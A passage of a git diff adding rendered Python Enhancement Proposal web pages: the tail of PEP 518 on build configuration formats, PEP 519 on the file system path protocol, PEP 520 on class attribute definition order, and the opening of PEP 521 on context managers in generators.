Two is that YAML itself is not safe by default. The specification +allows for the arbitrary execution of code which is best avoided when +dealing with configuration data. It is of course possible to avoid +this behavior – for example, PyYAML provides a safe_load operation +– but if any tool carelessly uses load instead then they open +themselves up to arbitrary code execution. While this PEP is focused on +the building of projects which inherently involves code execution, +other configuration data such as project name and version number may +end up in the same file someday where arbitrary code execution is not +desired.

+

And finally, the most popular Python implementation of YAML is +PyYAML [10] which is a large project of a few thousand lines of +code and an optional C extension module. While in and of itself this +isn’t necessarily an issue, this becomes more of a problem for +projects like pip where they would most likely need to vendor PyYAML +as a dependency so as to be fully self-contained (otherwise you end +up with your install tool needing an install tool to work). A +proof-of-concept re-working of PyYAML has been done to see how easy +it would be to potentially vendor a simpler version of the library +which shows it is a possibility.

+

An example YAML file is:

+
build:
+    requires:
+        - setuptools
+        - wheel>=0.27
+
+
+
+
+

configparser

+

An INI-style configuration file based on what +configparser [9] accepts was considered. Unfortunately +there is no specification of what configparser accepts, leading to +support skew between versions. For instance, what ConfigParser in +Python 2.7 accepts is not the same as what configparser in Python 3 +accepts. While one could standardize on what Python 3 accepts and +simply vendor the backport of the configparser module, that does mean +this PEP would have to codify that the backport of configparser must +be used by all project wishes to consume the metadata specified by +this PEP. This is overly restrictive and could lead to confusion if +someone is not aware of that a specific version of configparser is +expected.

+

An example INI file is:

+
[build]
+requires =
+    setuptools
+    wheel>=0.27
+
+
+
+
+

Python literals

+

Someone proposed using Python literals as the configuration format. +The file would contain one dict at the top level, with the data all +inside that dict, with sections defined by the keys. All Python +programmers would be used to the format, there would implicitly be no +third-party dependency to read the configuration data, and it can be +safe if parsed by ast.literal_eval() [13]. +Python literals can be identical to JSON, with the added benefit of +supporting trailing commas and comments. In addition, Python’s richer +data model may be useful for some future configuration needs (e.g. non-string +dict keys, floating point vs. integer values).

+

On the other hand, python literals are a Python-specific format, and +it is anticipated that these data may need to be read by packaging +tools, etc. that are not written in Python.

+

An example Python literal file for the proposed data would be:

+
# The build configuration
+{"build": {"requires": ["setuptools",
+                        "wheel>=0.27", # note the trailing comma
+                        # "numpy>=1.10" # a commented out data line
+                        ]
+# and here is an arbitrary comment.
+           }
+ }
+
+
+
+
+
+

Sticking with setup.cfg

+

There are two issues with setup.cfg used by setuptools as a general +format. One is that they are .ini files which have issues as mentioned +in the configparser discussion above. The other is that the schema for +that file has never been rigorously defined and thus it’s unknown which +format would be safe to use going forward without potentially confusing +setuptools installations.

+
+
+

Other file names

+

Several other file names were considered and rejected (although this +is very much a bikeshedding topic, and so the decision comes down to +mostly taste).

+
+
pysettings.toml
Most reasonable alternative.
+
pypa.toml
While it makes sense to reference the PyPA [11], it is a +somewhat niche term. It’s better to have the file name make sense +without having domain-specific knowledge.
+
pybuild.toml
From the restrictive perspective of this PEP this filename makes +sense, but if any non-build metadata ever gets added to the file +then the name ceases to make sense.
+
pip.toml
Too tool-specific.
+
meta.toml
Too generic; project may want to have its own metadata file.
+
setup.toml
While keeping with traditional thanks to setup.py, it does not +necessarily match what the file may contain in the future (e.g. is +knowing the name of a project inherently part of its setup?).
+
pymeta.toml
Not obvious to newcomers to programming and/or Python.
+
pypackage.toml & pypackaging.toml
Name conflation of what a “package” is (project versus namespace).
+
pydevelop.toml
The file may contain details not specific to development.
+
pysource.toml
Not directly related to source code.
+
pytools.toml
Misleading as the file is (currently) aimed at project management.
+
dstufft.toml
Too person-specific. ;)
+
+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0518.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0519/index.html b/pep-0519/index.html new file mode 100644 index 00000000000..3f89d350bca --- /dev/null +++ b/pep-0519/index.html @@ -0,0 +1,667 @@ + + + + + + + + PEP 519 – Adding a file system path protocol | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 519 – Adding a file system path protocol

+
+
Author:
+
Brett Cannon <brett at python.org>, +Koos Zevenhoven <k7hoven at gmail.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
11-May-2016
+
Python-Version:
+
3.6
+
Post-History:
+
11-May-2016, +12-May-2016, +13-May-2016
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a protocol for classes which represent a file system +path to be able to provide a str or bytes representation. +Changes to Python’s standard library are also proposed to utilize this +protocol where appropriate to facilitate the use of path objects where +historically only str and/or bytes file system paths are +accepted. The goal is to facilitate the migration of users towards +rich path objects while providing an easy way to work with code +expecting str or bytes.

+
+
+

Rationale

+

Historically in Python, file system paths have been represented as +strings or bytes. This choice of representation has stemmed from C’s +own decision to represent file system paths as +const char * [3]. While that is a totally serviceable +format to use for file system paths, it’s not necessarily optimal. At +issue is the fact that while all file system paths can be represented +as strings or bytes, not all strings or bytes represent a file system +path. This can lead to issues where any e.g. string duck-types to a +file system path whether it actually represents a path or not.

+

To help elevate the representation of file system paths from their +representation as strings and bytes to a richer object representation, +the pathlib module [4] was provisionally introduced in +Python 3.4 through PEP 428. While considered by some as an improvement +over strings and bytes for file system paths, it has suffered from a +lack of adoption. Typically the key issue listed for the low adoption +rate has been the lack of support in the standard library. This lack +of support required users of pathlib to manually convert path objects +to strings by calling str(path) which many found error-prone.

+

One issue in converting path objects to strings comes from +the fact that the only generic way to get a string representation of +the path was to pass the object to str(). This can pose a +problem when done blindly as nearly all Python objects have some +string representation whether they are a path or not, e.g. +str(None) will give a result that +builtins.open() [5] will happily use to create a new +file.

+

Exacerbating this whole situation is the +DirEntry object [8]. While path objects have a +representation that can be extracted using str(), DirEntry +objects expose a path attribute instead. Having no common +interface between path objects, DirEntry, and any other +third-party path library has become an issue. A solution that allows +any path-representing object to declare that it is a path and a way +to extract a low-level representation that all path objects could +support is desired.

+

This PEP then proposes to introduce a new protocol to be followed by +objects which represent file system paths. Providing a protocol allows +for explicit signaling of what objects represent file system paths as +well as a way to extract a lower-level representation that can be used +with older APIs which only support strings or bytes.

+

Discussions regarding path objects that led to this PEP can be found +in multiple threads on the python-ideas mailing list archive +[1] for the months of March and April 2016 and on +the python-dev mailing list archives [2] during +April 2016.

+
+
+

Proposal

+

This proposal is split into two parts. One part is the proposal of a +protocol for objects to declare and provide support for exposing a +file system path representation. The other part deals with changes to +Python’s standard library to support the new protocol. These changes +will also lead to the pathlib module dropping its provisional status.

+
+

Protocol

+

The following abstract base class defines the protocol for an object +to be considered a path object:

+
import abc
+import typing as t
+
+
+class PathLike(abc.ABC):
+
+    """Abstract base class for implementing the file system path protocol."""
+
+    @abc.abstractmethod
+    def __fspath__(self) -> t.Union[str, bytes]:
+        """Return the file system path representation of the object."""
+        raise NotImplementedError
+
+
+

Objects representing file system paths will implement the +__fspath__() method which will return the str or bytes +representation of the path. The str representation is the +preferred low-level path representation as it is human-readable and +what people historically represent paths as.

+
+
+

Standard library changes

+

It is expected that most APIs in Python’s standard library that +currently accept a file system path will be updated appropriately to +accept path objects (whether that requires code or simply an update +to documentation will vary). The modules mentioned below, though, +deserve specific details as they have either fundamental changes that +empower the ability to use path objects, or entail additions/removal +of APIs.

+
+

builtins

+

open() [5] will be updated to accept path objects as +well as continue to accept str and bytes.

+
+
+

os

+

The fspath() function will be added with the following semantics:

+
import typing as t
+
+
+def fspath(path: t.Union[PathLike, str, bytes]) -> t.Union[str, bytes]:
+    """Return the string representation of the path.
+
+    If str or bytes is passed in, it is returned unchanged. If __fspath__()
+    returns something other than str or bytes then TypeError is raised. If
+    this function is given something that is not str, bytes, or os.PathLike
+    then TypeError is raised.
+    """
+    if isinstance(path, (str, bytes)):
+        return path
+
+    # Work from the object's type to match method resolution of other magic
+    # methods.
+    path_type = type(path)
+    try:
+        path = path_type.__fspath__(path)
+    except AttributeError:
+        if hasattr(path_type, '__fspath__'):
+            raise
+    else:
+        if isinstance(path, (str, bytes)):
+            return path
+        else:
+            raise TypeError("expected __fspath__() to return str or bytes, "
+                            "not " + type(path).__name__)
+
+    raise TypeError("expected str, bytes or os.PathLike object, not "
+                    + path_type.__name__)
+
+
+

The os.fsencode() [6] and +os.fsdecode() [7] functions will be updated to accept +path objects. As both functions coerce their arguments to +bytes and str, respectively, they will be updated to call +__fspath__() if present to convert the path object to a str or +bytes representation, and then perform their appropriate +coercion operations as if the return value from __fspath__() had +been the original argument to the coercion function in question.

+

The addition of os.fspath(), the updates to +os.fsencode()/os.fsdecode(), and the current semantics of +pathlib.PurePath provide the semantics necessary to +get the path representation one prefers. For a path object, +pathlib.PurePath/Path can be used. To obtain the str or +bytes representation without any coercion, then os.fspath() +can be used. If a str is desired and the encoding of bytes +should be assumed to be the default file system encoding, then +os.fsdecode() should be used. If a bytes representation is +desired and any strings should be encoded using the default file +system encoding, then os.fsencode() is used. This PEP recommends +using path objects when possible and falling back to string paths as +necessary and using bytes as a last resort.

+

Another way to view this is as a hierarchy of file system path +representations (highest- to lowest-level): path → str → bytes. The +functions and classes under discussion can all accept objects on the +same level of the hierarchy, but they vary in whether they promote or +demote objects to another level. The pathlib.PurePath class can +promote a str to a path object. The os.fspath() function can +demote a path object to a str or bytes instance, depending +on what __fspath__() returns. +The os.fsdecode() function will demote a path object to +a string or promote a bytes object to a str. The +os.fsencode() function will demote a path or string object to +bytes. There is no function that provides a way to demote a path +object directly to bytes while bypassing string demotion.

+

The DirEntry object [8] will gain an __fspath__() +method. It will return the same value as currently found on the +path attribute of DirEntry instances.

+

The Protocol ABC will be added to the os module under the name +os.PathLike.

+
+
+

os.path

+

The various path-manipulation functions of os.path [9] +will be updated to accept path objects. For polymorphic functions that +accept both bytes and strings, they will be updated to simply use +os.fspath().

+

During the discussions leading up to this PEP it was suggested that +os.path not be updated using an “explicit is better than implicit” +argument. The thinking was that since __fspath__() is polymorphic +itself it may be better to have code working with os.path extract +the path representation from path objects explicitly. There is also +the consideration that adding support this deep into the low-level OS +APIs will lead to code magically supporting path objects without +requiring any documentation updated, leading to potential complaints +when it doesn’t work, unbeknownst to the project author.

+

But it is the view of this PEP that “practicality beats purity” in +this instance. To help facilitate the transition to supporting path +objects, it is better to make the transition as easy as possible than +to worry about unexpected/undocumented duck typing support for +path objects by projects.

+

There has also been the suggestion that os.path functions could be +used in a tight loop and the overhead of checking or calling +__fspath__() would be too costly. In this scenario only +path-consuming APIs would be directly updated and path-manipulating +APIs like the ones in os.path would go unmodified. This would +require library authors to update their code to support path objects +if they performed any path manipulations, but if the library code +passed the path straight through then the library wouldn’t need to be +updated. It is the view of this PEP and Guido, though, that this is an +unnecessary worry and that performance will still be acceptable.

+
+
+

pathlib

+

The constructor for pathlib.PurePath and pathlib.Path will be +updated to accept PathLike objects. Both PurePath and Path +will continue to not accept bytes path representations, and so if +__fspath__() returns bytes it will raise an exception.

+

The path attribute will be removed as this PEP makes it +redundant (it has not been included in any released version of Python +and so is not a backwards-compatibility concern).

+
+
+

C API

+

The C API will gain an equivalent function to os.fspath():

+
/*
+    Return the file system path representation of the object.
+
+    If the object is str or bytes, then allow it to pass through with
+    an incremented refcount. If the object defines __fspath__(), then
+    return the result of that method. All other types raise a TypeError.
+*/
+PyObject *
+PyOS_FSPath(PyObject *path)
+{
+    _Py_IDENTIFIER(__fspath__);
+    PyObject *func = NULL;
+    PyObject *path_repr = NULL;
+
+    if (PyUnicode_Check(path) || PyBytes_Check(path)) {
+        Py_INCREF(path);
+        return path;
+    }
+
+    func = _PyObject_LookupSpecial(path, &PyId___fspath__);
+    if (NULL == func) {
+        return PyErr_Format(PyExc_TypeError,
+                            "expected str, bytes or os.PathLike object, "
+                            "not %S",
+                            path->ob_type);
+    }
+
+    path_repr = PyObject_CallFunctionObjArgs(func, NULL);
+    Py_DECREF(func);
+    if (!PyUnicode_Check(path_repr) && !PyBytes_Check(path_repr)) {
+        Py_DECREF(path_repr);
+        return PyErr_Format(PyExc_TypeError,
+                            "expected __fspath__() to return str or bytes, "
+                            "not %S",
+                            path_repr->ob_type);
+    }
+
+    return path_repr;
+}
+
+
+
+
+
+
+

Backwards compatibility

+

There are no explicit backwards-compatibility concerns. Unless an +object incidentally already defines a __fspath__() method there is +no reason to expect the pre-existing code to break or expect to have +its semantics implicitly changed.

+

Libraries wishing to support path objects and a version of Python +prior to Python 3.6 and the existence of os.fspath() can use the +idiom of +path.__fspath__() if hasattr(path, "__fspath__") else path.

+
+
+

Implementation

+

This is the task list for what this PEP proposes to be changed in +Python 3.6:

+
    +
  1. Remove the path attribute from pathlib +(done)
  2. +
  3. Remove the provisional status of pathlib +(done)
  4. +
  5. Add os.PathLike +(code and +docs done)
  6. +
  7. Add PyOS_FSPath() +(code and +docs done)
  8. +
  9. Add os.fspath() +(done <done)
  10. +
  11. Update os.fsencode() +(done)
  12. +
  13. Update os.fsdecode() +(done)
  14. +
  15. Update pathlib.PurePath and pathlib.Path +(done)
      +
    1. Add __fspath__()
    2. +
    3. Add os.PathLike support to the constructors
    4. +
    +
  16. +
  17. Add __fspath__() to DirEntry +(done)
  18. +
  19. Update builtins.open() +(done)
  20. +
  21. Update os.path +(done)
  22. +
  23. Add a glossary entry for “path-like” +(done)
  24. +
  25. Update “What’s New” +(done)
  26. +
+
+
+

Rejected Ideas

+
+

Other names for the protocol’s method

+

Various names were proposed during discussions leading to this PEP, +including __path__, __pathname__, and __fspathname__. In +the end people seemed to gravitate towards __fspath__ for being +unambiguous without being unnecessarily long.

+
+
+

Separate str/bytes methods

+

At one point it was suggested that __fspath__() only return +strings and another method named __fspathb__() be introduced to +return bytes. The thinking is that by making __fspath__() not be +polymorphic it could make dealing with the potential string or bytes +representations easier. But the general consensus was that returning +bytes will more than likely be rare and that the various functions in +the os module are the better abstraction to promote over direct +calls to __fspath__().

+
+
+

Providing a path attribute

+

To help deal with the issue of pathlib.PurePath not inheriting +from str, originally it was proposed to introduce a path +attribute to mirror what os.DirEntry provides. In the end, +though, it was determined that a protocol would provide the same +result while not directly exposing an API that most people will never +need to interact with directly.

+
+
+

Have __fspath__() only return strings

+

Much of the discussion that led to this PEP revolved around whether +__fspath__() should be polymorphic and return bytes as well as +str or only return str. The general sentiment for this view +was that bytes are difficult to work with due to their +inherent lack of information about their encoding and PEP 383 makes +it possible to represent all file system paths using str with the +surrogateescape handler. Thus, it would be better to forcibly +promote the use of str as the low-level path representation for +high-level path objects.

+

In the end, it was decided that using bytes to represent paths is +simply not going to go away and thus they should be supported to some +degree. The hope is that people will gravitate towards path objects +like pathlib and that will move people away from operating directly +with bytes.

+
+
+

A generic string encoding mechanism

+

At one point there was a discussion of developing a generic mechanism +to extract a string representation of an object that had semantic +meaning (__str__() does not necessarily return anything of +semantic significance beyond what may be helpful for debugging). In +the end, it was deemed to lack a motivating need beyond the one this +PEP is trying to solve in a specific fashion.

+
+
+

Have __fspath__ be an attribute

+

It was briefly considered to have __fspath__ be an attribute +instead of a method. This was rejected for two reasons. One, +historically protocols have been implemented as “magic methods” and +not “magic methods and attributes”. Two, there is no guarantee that +the lower-level representation of a path object will be pre-computed, +potentially misleading users that there was no expensive computation +behind the scenes in case the attribute was implemented as a property.

+

This also indirectly ties into the idea of introducing a path +attribute to accomplish the same thing. This idea has an added issue, +though, of accidentally having any object with a path attribute +meet the protocol’s duck typing. Introducing a new magic method for +the protocol helpfully avoids any accidental opting into the protocol.

+
+
+

Provide specific type hinting support

+

There was some consideration to providing a generic typing.PathLike +class which would allow for e.g. typing.PathLike[str] to specify +a type hint for a path object which returned a string representation. +While potentially beneficial, the usefulness was deemed too small to +bother adding the type hint class.

+

This also removed any desire to have a class in the typing module +which represented the union of all acceptable path-representing types +as that can be represented with +typing.Union[str, bytes, os.PathLike] easily enough and the hope +is users will slowly gravitate to path objects only.

+
+
+

Provide os.fspathb()

+

It was suggested that to mirror the structure of e.g. +os.getcwd()/os.getcwdb(), that os.fspath() only return +str and that another function named os.fspathb() be +introduced that only returned bytes. This was rejected as the +purposes of the *b() functions are tied to querying the file +system where there is a need to get the raw bytes back. As this PEP +does not work directly with data on a file system (but which may +be), the view was taken this distinction is unnecessary. It’s also +believed that the need for only bytes will not be common enough to +need to support in such a specific manner as os.fsencode() will +provide similar functionality.

+
+
+

Call __fspath__() off of the instance

+

An earlier draft of this PEP had os.fspath() calling +path.__fspath__() instead of type(path).__fspath__(path). The +changed to be consistent with how other magic methods in Python are +resolved.

+
+
+
+

Acknowledgements

+

Thanks to everyone who participated in the various discussions related +to this PEP that spanned both python-ideas and python-dev. Special +thanks to Stephen Turnbull for direct feedback on early drafts of this +PEP. More special thanks to Koos Zevenhoven and Ethan Furman for not +only feedback on early drafts of this PEP but also helping to drive +the overall discussion on this topic across the two mailing lists.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0519.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0520/index.html b/pep-0520/index.html new file mode 100644 index 00000000000..9458de0545a --- /dev/null +++ b/pep-0520/index.html @@ -0,0 +1,547 @@ + + + + + + + + PEP 520 – Preserving Class Attribute Definition Order | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 520 – Preserving Class Attribute Definition Order

+
+
Author:
+
Eric Snow <ericsnowcurrently at gmail.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
07-Jun-2016
+
Python-Version:
+
3.6
+
Post-History:
+
07-Jun-2016, 11-Jun-2016, 20-Jun-2016, 24-Jun-2016
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Note

+

Since compact dict has landed in 3.6, __definition_order__ +has been removed. cls.__dict__ now mostly accomplishes the same +thing instead.

+
+
+

Abstract

+

The class definition syntax is ordered by its very nature. Class +attributes defined there are thus ordered. Aside from helping with +readability, that ordering is sometimes significant. If it were +automatically available outside the class definition then the +attribute order could be used without the need for extra boilerplate +(such as metaclasses or manually enumerating the attribute order). +Given that this information already exists, access to the definition +order of attributes is a reasonable expectation. However, currently +Python does not preserve the attribute order from the class +definition.

+

This PEP changes that by preserving the order in which attributes +are introduced in the class definition body. That order will now be +preserved in the __definition_order__ attribute of the class. +This allows introspection of the original definition order, e.g. by +class decorators.

+

Additionally, this PEP requires that the default class definition +namespace be ordered (e.g. OrderedDict) by default. The +long-lived class namespace (__dict__) will remain a dict.

+
+
+

Motivation

+

The attribute order from a class definition may be useful to tools +that rely on name order. However, without the automatic availability +of the definition order, those tools must impose extra requirements on +users. For example, use of such a tool may require that your class use +a particular metaclass. Such requirements are often enough to +discourage use of the tool.

+

Some tools that could make use of this PEP include:

+
    +
  • documentation generators
  • +
  • testing frameworks
  • +
  • CLI frameworks
  • +
  • web frameworks
  • +
  • config generators
  • +
  • data serializers
  • +
  • enum factories (my original motivation)
  • +
+
+
+

Background

+

When a class is defined using a class statement, the class body +is executed within a namespace. Currently that namespace defaults to +dict. If the metaclass defines __prepare__() then the result +of calling it is used for the class definition namespace.

+

After the execution completes, the definition namespace is +copied into a new dict. Then the original definition namespace is +discarded. The new copy is stored away as the class’s namespace and +is exposed as __dict__ through a read-only proxy.

+

The class attribute definition order is represented by the insertion +order of names in the definition namespace. Thus, we can have +access to the definition order by switching the definition namespace +to an ordered mapping, such as collections.OrderedDict. This is +feasible using a metaclass and __prepare__, as described above. +In fact, exactly this is by far the most common use case for using +__prepare__.

+

At that point, the only missing thing for later access to the +definition order is storing it on the class before the definition +namespace is thrown away. Again, this may be done using a metaclass. +However, this means that the definition order is preserved only for +classes that use such a metaclass. There are two practical problems +with that:

+

First, it requires the use of a metaclass. Metaclasses introduce an +extra level of complexity to code and in some cases (e.g. conflicts) +are a problem. So reducing the need for them is worth doing when the +opportunity presents itself. PEP 422 and PEP 487 discuss this at +length. We have such an opportunity by using an ordered mapping (e.g. +OrderedDict for CPython at least) for the default class definition +namespace, virtually eliminating the need for __prepare__().

+

Second, only classes that opt in to using the OrderedDict-based +metaclass will have access to the definition order. This is problematic +for cases where universal access to the definition order is important.

+
+
+

Specification

+

Part 1:

+
    +
  • all classes have a __definition_order__ attribute
  • +
  • __definition_order__ is a tuple of identifiers (or None)
  • +
  • __definition_order__ is always set:
      +
    1. during execution of the class body, the insertion order of names +into the class definition namespace is stored in a tuple
    2. +
    3. if __definition_order__ is defined in the class body then it +must be a tuple of identifiers or None; any other value +will result in TypeError
    4. +
    5. classes that do not have a class definition (e.g. builtins) have +their __definition_order__ set to None
    6. +
    7. classes for which __prepare__() returned something other than +OrderedDict (or a subclass) have their __definition_order__ +set to None (except where #2 applies)
    8. +
    +
  • +
+

Not changing:

+
    +
  • dir() will not depend on __definition_order__
  • +
  • descriptors and custom __getattribute__ methods are unconstrained +regarding __definition_order__
  • +
+

Part 2:

+
    +
  • the default class definition namespace is now an ordered mapping +(e.g. OrderdDict)
  • +
  • cls.__dict__ does not change, remaining a read-only proxy around +dict
  • +
+

Note that Python implementations which have an ordered dict won’t +need to change anything.

+

The following code demonstrates roughly equivalent semantics for both +parts 1 and 2:

+
class Meta(type):
+    @classmethod
+    def __prepare__(cls, *args, **kwargs):
+        return OrderedDict()
+
+class Spam(metaclass=Meta):
+    ham = None
+    eggs = 5
+    __definition_order__ = tuple(locals())
+
+
+
+

Why a tuple?

+

Use of a tuple reflects the fact that we are exposing the order in +which attributes on the class were defined. Since the definition +is already complete by the time __definition_order__ is set, the +content and order of the value won’t be changing. Thus we use a type +that communicates that state of immutability.

+
+
+

Why not a read-only attribute?

+

There are some valid arguments for making __definition_order__ +a read-only attribute (like cls.__dict__ is). Most notably, a +read-only attribute conveys the nature of the attribute as “complete”, +which is exactly correct for __definition_order__. Since it +represents the state of a particular one-time event (execution of +the class definition body), allowing the value to be replaced would +reduce confidence that the attribute corresponds to the original class +body. Furthermore, often an immutable-by-default approach helps to +make data easier to reason about.

+

However, in this case there still isn’t a strong reason to counter +the well-worn precedent found in Python. Per Guido:

+
I don't see why it needs to be a read-only attribute. There are
+very few of those -- in general we let users play around with
+things unless we have a hard reason to restrict assignment (e.g.
+the interpreter's internal state could be compromised). I don't
+see such a hard reason here.
+
+
+

Also, note that a writeable __definition_order__ allows dynamically +created classes (e.g. by Cython) to still have __definition_order__ +properly set. That could certainly be handled through specific +class-creation tools, such as type() or the C-API, without the need +to lose the semantics of a read-only attribute. However, with a +writeable attribute it’s a moot point.

+
+
+

Why not “__attribute_order__”?

+

__definition_order__ is centered on the class definition +body. The use cases for dealing with the class namespace (__dict__) +post-definition are a separate matter. __definition_order__ would +be a significantly misleading name for a feature focused on more than +class definition.

+
+
+

Why not ignore “dunder” names?

+

Names starting and ending with “__” are reserved for use by the +interpreter. In practice they should not be relevant to the users of +__definition_order__. Instead, for nearly everyone they would only +be clutter, causing the same extra work (filtering out the dunder +names) for the majority. In cases where a dunder name is significant, +the class definition could manually set __definition_order__, +making the common case simpler.

+

However, leaving dunder names out of __definition_order__ means +that their place in the definition order would be unrecoverably lost. +Dropping dunder names by default may inadvertently cause problems for +classes that use dunder names unconventionally. In this case it’s +better to play it safe and preserve all the names from the class +definition. This isn’t a big problem since it is easy to filter out +dunder names:

+
(name for name in cls.__definition_order__
+      if not (name.startswith('__') and name.endswith('__')))
+
+
+

In fact, in some application contexts there may be other criteria on +which similar filtering would be applied, such as ignoring any name +starting with “_”, leaving out all methods, or including only +descriptors. Ultimately dunder names aren’t a special enough case to +be treated exceptionally.

+

Note that a couple of dunder names (__name__ and __qualname__) +are injected by default by the compiler. So they will be included even +though they are not strictly part of the class definition body.

+
+
+

Why None instead of an empty tuple?

+

A key objective of adding __definition_order__ is to preserve +information in class definitions which was lost prior to this PEP. +One consequence is that __definition_order__ implies an original +class definition. Using None allows us to clearly distinguish +classes that do not have a definition order. An empty tuple clearly +indicates a class that came from a definition statement but did not +define any attributes there.

+
+
+

Why None instead of not setting the attribute?

+

The absence of an attribute requires more complex handling than None +does for consumers of __definition_order__.

+
+
+

Why constrain manually set values?

+

If __definition_order__ is manually set in the class body then it +will be used. We require it to be a tuple of identifiers (or None) +so that consumers of __definition_order__ may have a consistent +expectation for the value. That helps maximize the feature’s +usefulness.

+

We could also allow an arbitrary iterable for a manually set +__definition_order__ and convert it into a tuple. However, not +all iterables infer a definition order (e.g. set). So we opt in +favor of requiring a tuple.

+
+
+

Why not hide __definition_order__ on non-type objects?

+

Python doesn’t make much effort to hide class-specific attributes +during lookup on instances of classes. While it may make sense +to consider __definition_order__ a class-only attribute, hidden +during lookup on objects, setting precedent in that regard is +beyond the goals of this PEP.

+
+
+

What about __slots__?

+

__slots__ will be added to __definition_order__ like any +other name in the class definition body. The actual slot names +will not be added to __definition_order__ since they aren’t +set as names in the definition namespace.

+
+
+

Why is __definition_order__ even necessary?

+

Since the definition order is not preserved in __dict__, it is +lost once class definition execution completes. Classes could +explicitly set the attribute as the last thing in the body. However, +then independent decorators could only make use of classes that had done +so. Instead, __definition_order__ preserves this one bit of info +from the class body so that it is universally available.

+
+
+
+

Support for C-API Types

+

Arguably, most C-defined Python types (e.g. built-in, extension modules) +have a roughly equivalent concept of a definition order. So conceivably +__definition_order__ could be set for such types automatically. This +PEP does not introduce any such support. However, it does not prohibit +it either. However, since __definition_order__ can be set at any +time through normal attribute assignment, it does not need any special +treatment in the C-API.

+

The specific cases:

+
    +
  • builtin types
  • +
  • PyType_Ready
  • +
  • PyType_FromSpec
  • +
+
+
+

Compatibility

+

This PEP does not break backward compatibility, except in the case that +someone relies strictly on dict as the class definition namespace. +This shouldn’t be a problem since issubclass(OrderedDict, dict) is +true.

+
+
+

Changes

+

In addition to the class syntax, the following expose the new behavior:

+
    +
  • builtins.__build_class__
  • +
  • types.prepare_class
  • +
  • types.new_class
  • +
+

Also, the 3-argument form of builtins.type() will allow inclusion +of __definition_order__ in the namespace that gets passed in. It +will be subject to the same constraints as when __definition_order__ +is explicitly defined in the class body.

+
+
+

Other Python Implementations

+

Pending feedback, the impact on Python implementations is expected to +be minimal. All conforming implementations are expected to set +__definition_order__ as described in this PEP.

+
+
+

Implementation

+

The implementation is found in the +tracker.

+
+
+

Alternatives

+
+

An Order-preserving cls.__dict__

+

Instead of storing the definition order in __definition_order__, +the now-ordered definition namespace could be copied into a new +OrderedDict. This would then be used as the mapping proxied as +__dict__. Doing so would mostly provide the same semantics.

+

However, using OrderedDict for __dict__ would obscure the +relationship with the definition namespace, making it less useful.

+

Additionally, (in the case of OrderedDict specifically) doing +this would require significant changes to the semantics of the +concrete dict C-API.

+

There has been some discussion about moving to a compact dict +implementation which would (mostly) preserve insertion order. However +the lack of an explicit __definition_order__ would still remain +as a pain point.

+
+
+

A “namespace” Keyword Arg for Class Definition

+

PEP 422 +introduced a new “namespace” keyword arg to class definitions +that effectively replaces the need to __prepare__(). +However, the proposal was withdrawn in favor of the simpler PEP 487.

+
+
+

A stdlib Metaclass that Implements __prepare__() with OrderedDict

+

This has all the same problems as writing your own metaclass. The +only advantage is that you don’t have to actually write this +metaclass. So it doesn’t offer any benefit in the context of this +PEP.

+
+
+

Set __definition_order__ at Compile-time

+

Each class’s __qualname__ is determined at compile-time. +This same concept could be applied to __definition_order__. +The result of composing __definition_order__ at compile-time +would be nearly the same as doing so at run-time.

+

Comparative implementation difficulty aside, the key difference +would be that at compile-time it would not be practical to +preserve definition order for attributes that are set dynamically +in the class body (e.g. locals()[name] = value). However, +they should still be reflected in the definition order. One +possible resolution would be to require class authors to manually +set __definition_order__ if they define any class attributes +dynamically.

+

Ultimately, the use of OrderedDict at run-time or compile-time +discovery is almost entirely an implementation detail.

+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0520.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0521/index.html b/pep-0521/index.html new file mode 100644 index 00000000000..3048f707512 --- /dev/null +++ b/pep-0521/index.html @@ -0,0 +1,488 @@ + + + + + + + + PEP 521 – Managing global context via ‘with’ blocks in generators and coroutines | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 521 – Managing global context via ‘with’ blocks in generators and coroutines

+
+
Author:
+
Nathaniel J. Smith <njs at pobox.com>
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
27-Apr-2015
+
Python-Version:
+
3.6
+
Post-History:
+
29-Apr-2015
+
+
+
+
Table of Contents +
+
+

PEP Withdrawal

+

Withdrawn in favor of PEP 567.

+
+
+

Abstract

+

While we generally try to avoid global state when possible, there +nonetheless exist a number of situations where it is agreed to be the +best approach. In Python, a standard pattern for handling such cases +is to store the global state in global or thread-local storage, and +then use with blocks to limit modifications of this global state +to a single dynamic scope. Examples where this pattern is used include +the standard library’s warnings.catch_warnings and +decimal.localcontext, NumPy’s numpy.errstate (which exposes +the error-handling settings provided by the IEEE 754 floating point +standard), and the handling of logging context or HTTP request context +in many server application frameworks.

+

However, there is currently no ergonomic way to manage such local +changes to global state when writing a generator or coroutine. For +example, this code:

+
def f():
+    with warnings.catch_warnings():
+        for x in g():
+            yield x
+
+
+

